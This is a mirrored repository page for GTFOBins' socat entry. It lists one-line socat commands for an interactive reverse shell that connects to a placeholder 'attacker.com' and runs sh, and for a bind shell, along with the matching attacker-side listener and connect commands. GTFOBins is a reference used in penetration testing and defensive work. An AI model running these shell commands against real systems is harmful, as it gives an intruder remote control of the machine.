This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-14 19:31:34 +01:00
Code
Issues
1b5f2aedae
GTFOBins.github.io
/
_gtfobins
/
socat.md
Andrea Cardaci
358628c2f2
Remove hardcoded instances of bash
2018-05-28 17:48:26 +02:00
585 B
Raw
Blame
History
functions
reverse-shell-interactive
bind-shell-interactive
description
code
Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
RHOST=attacker.com RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
description
code
Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane